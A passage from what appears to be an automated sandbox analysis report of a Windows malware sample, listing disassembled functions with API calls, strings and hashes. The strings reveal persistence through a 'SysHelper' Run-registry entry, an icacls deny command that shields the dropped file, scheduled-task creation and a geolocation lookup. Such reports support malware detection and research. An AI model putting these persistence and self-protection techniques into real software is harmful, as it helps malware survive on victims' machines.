                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0074DF68,?), ref: 0041A0BB
                                                                                                                                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                                                                                                                        • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                        • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                        • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                                                      • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                                                                                                                      • API String ID: 2957410896-3144399390
                                                                                                                                                                                                      • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                                                                                                                      • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040D240, Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                                                                                                                      • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                                                                      • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                                                                      • API String ID: 2496729271-1738591096
                                                                                                                                                                                                      • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                      • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412220, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                                                                                                                      • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                                                                                                                      • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 00412347
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressProc$CommandEnumFindLibraryLineLoadNameProcess$ArgvBaseChangeCloseFileModuleModulesNotificationOpenPathProcesses
                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                                                      • API String ID: 1498397660-3807497772
                                                                                                                                                                                                      • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                                                                                      • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040CF10, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                      • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                                                                                                                                      • "country_code":", xrefs: 0040CFE1
                                                                                                                                                                                                      • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                                                      • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                                                      • API String ID: 1485416377-2962370585
                                                                                                                                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                      • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411CD0, Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00411D3B
                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                                                                                      • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 00411ECE
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                                                                                                                      • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                                                                                                                      • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                                                                                                                      • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                                                                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                                                                                                                      • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00412090
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 004120AA
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                                                                                                                      • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00412120
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 00412158
                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                                                      • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                                                      • API String ID: 2589766509-1182136429
                                                                                                                                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                      • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00423576, Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004235B1
                                                                                                                                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 004236F3
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00423726
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 0042375B
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 004237EA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00427B0B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                                                                                                                                                                                        • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                                                                                                                                                                                        • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00427B1A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                      • String ID: i;B
                                                                                                                                                                                                      • API String ID: 2427264223-472376889
                                                                                                                                                                                                      • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                                                                      • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040EF50, Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040EF69
                                                                                                                                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0040EF85
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040EF9B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _malloc$AllocateHeap_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3655941445-0
                                                                                                                                                                                                      • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                                                      • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                                                                                                                                                                                                      • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0042FB64, Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0042FB7B
                                                                                                                                                                                                        • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                                                                        • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                                                                      • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                                                                                                                        • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                                                                                                                        • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                                                                                                                        • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                                                                                                                        • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                                                                                                                        • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                                                                                                                        • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 360932542-0
                                                                                                                                                                                                      • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                                                                      • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00427F3D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _doexit.LIBCMT ref: 00427F47
                                                                                                                                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                                                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                                                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                                                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                                                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                                                                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.240988360.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000003.00000002.241002744.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3712619029-0
                                                                                                                                                                                                      • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                                                      • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00410FC0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00411059
